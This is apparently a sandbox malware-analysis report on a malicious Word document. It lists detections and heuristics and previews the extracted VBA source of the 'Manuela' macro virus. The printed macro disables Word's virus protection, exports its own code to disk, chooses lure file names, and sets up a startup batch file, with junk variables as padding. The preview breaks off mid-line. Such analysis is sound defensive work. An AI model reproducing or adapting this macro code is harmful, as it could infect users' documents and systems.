MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros, including AutoOpen and AutoClose routines. The 'Manuela' macro attempts to export its own code to 'c:\Manuela.drv' and uses obfuscated string concatenation, suggesting it is preparing to download and execute a second-stage payload. The ClamAV detections further confirm its malicious nature.
Heuristics 5
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64242 bytes |
SHA-256: bfbb09d691ffcabb6984f4bc11e8171f5cacf420da535f9de6166c7665fdf705 |
|||
|
Detection
ClamAV:
Doc.Trojan.Vmpc-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Manuela"
Sub Manuela()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
UsEoVgKv = UiUt11709 & HmIn7730
IpUi10290 = UiUt11709 & BqTe6576 & Int(Rnd * 7793)
RrVn3588 = DvTzRjCg & KzQz9188 & Int(Rnd * 2527)
RrVn3588 = KhIu7369 & KzQz9188 & Int(Rnd * 3812)
UnTz3410 = GeKe14820 & VsLi17336 & Int(Rnd * 8167)
KhTuQjTw = GlUe9172 & GnMs9323
MpTq4803 = GlUe9172 & HuGm14936 & Int(Rnd * 7863)
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
VBE.ActiveVBProject.VBComponents("Manuela").Export "c:\Manuela.drv"
RpUe6243 = QqIkQqAo & NuJn4083 & Int(Rnd * 724)
RpUe6243 = EoJu2364 & NuJn4083 & Int(Rnd * 955)
CgHz8684 = LqQwJzEu & EgEp14649 & RqOwRqEw & HpDx11314
CgHz8684 = HpDx11314 & EgEp14649 & Int(Rnd * 4211)
QwBk4696 = HvVzMwFv & MfSi12772 & Int(Rnd * 5161)
QwBk4696 = AiGg6151 & MfSi12772 & Int(Rnd * 5920)
ActiveDocument.ReadOnlyRecommended = False
BfFqMuRo = IgNj8349 & RfGh13422
ShLs17516 = IgNj8349 & GjBf10447 & Int(Rnd * 3554)
OqFnThCr = MqOj10739 & PiRy8200
IhJv11053 = MqOj10739 & AwEf5529 & Int(Rnd * 3766)
HxHq9017 = IoJwEsKi & IeGm10210 & Int(Rnd * 5916)
HxHq9017 = PrQi5723 & IeGm10210 & Int(Rnd * 5193)
LqUr11219 = BhQyRpKv & OkQo8309 & LlDjRmOm & FgUm7944
LqUr11219 = FgUm7944 & OkQo8309 & Int(Rnd * 4257)
InOt19088 = AxOkTlAh & DtBe9899 & Int(Rnd * 9096)
InOt19088 = NqAz15248 & DtBe9899 & Int(Rnd * 8894)
DqFg = Int(Rnd * 100)
If DqFg = 99 Then MsgBox "Perfect !", vbSystemModal
NuGuIkOs = BsVz15822 & JsVu10684
BpNo9123 = BsVz15822 & MiEh7405 & Int(Rnd * 7365)
UtSz6230 = OeMpMlGw & CmEt10041 & Int(Rnd * 290)
UtSz6230 = RvIf14097 & CmEt10041 & Int(Rnd * 6030)
ArMzMqBz = EgNj3704 & GzJf11337
OkFu4624 = EgNj3704 & EyLi8116 & Int(Rnd * 2448)
If Month(Now()) = 12 Then Call FqFl1072DzRp
MnCfFnGx = UgMy8855 & AwJk11076
UmJr13920 = UgMy8855 & CnGn9780 & Int(Rnd * 5023)
TfCk8028 = BiPh2384 & IeSk2892 & Int(Rnd * 410)
GtRvTtCg = HnIm13951 & MgQz12329
PuOp14278 = HnIm13951 & CgQz13483 & Int(Rnd * 6312)
FgAf7053 = HxGkJkDo & UnNz9612 & Int(Rnd * 5350)
FgAf7053 = SpPw7311 & UnNz9612 & Int(Rnd * 551)
NqNt9587 = ToGlRxKo & HqDx3271 & Int(Rnd * 1178)
NqNt9587 = QgKl3940 & HqDx3271 & Int(Rnd * 597)
FgDg3981 = MpUsClFx & UiIt10397 & Int(Rnd * 3575)
FgDg3981 = HpEh13037 & UiIt10397 & Int(Rnd * 3571)
If Month(Now()) = 7 And Day(Now()) = 17 Then MsgBox "Manuela is 17 !!!", vbInformation, "Birthday Greeting!!!"
HfCf7564 = FeRgLgHn & NsUr7025 & Int(Rnd * 3210)
HfCf7564 = IuEw14266 & NsUr7025 & Int(Rnd * 7177)
MjEhRqIn = QtMj15010 & DnAw7002
IlHm6528 = QtMj15010 & GjNz3128 & Int(Rnd * 8770)
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Readme"
.Subject = " "
.Execute
End With
KzOyCnDq = SwDq13116 & RqCx14208
TiFu12301 = SwDq13116 & GgUr18781 & Int(Rnd * 6287)
EqPy16979 = OoCvQsOo & DuSl9923 & Int(Rnd * 4935)
EqPy16979 = UqJe7784 & DuSl9923 & Int(Rnd * 6849)
EeAs9706 = TsSqHrBw & AhGn14505 & KoLmKtTl & LxQv12305
EeAs9706 = LxQv12305 & AhGn14505 & Int(Rnd * 7693)
FoRmBeTe = ArEp16803 & HeTv12433
DfDt13051 = ArEp16803 & HoLj18663 & Int(Rnd * 7107)
JoUr5819$ = "c:\windows\startm~1\programs\startup\msfile.bat"
JnIv13873 = BlMj10017 & DpUp8234 & Int(Rnd * 1629)
IsPu18836 = SzQfOqCw & GiLj3390 & Int(Rnd * 9111)
IsPu18836 = NlJm10253 & GiLj3390 & Int(Rnd * 9777)
VhEq10723706 = GetAttr(NormalTemplate.FullName)
JjRvUiGi = AuBr14435 & TiBi12094
PmIi8897 = AuBr14435 & CzNo14007 & Int(Rnd * 8325)
CmJe8433 = HtSrEiGn & HrPu8140 & CyRmAqPy & HkMj6319
CmJe8433 = HkMj6319 & HrPu8140 & Int(Rnd * 5094)
If VhEq10723706 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(JoU
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.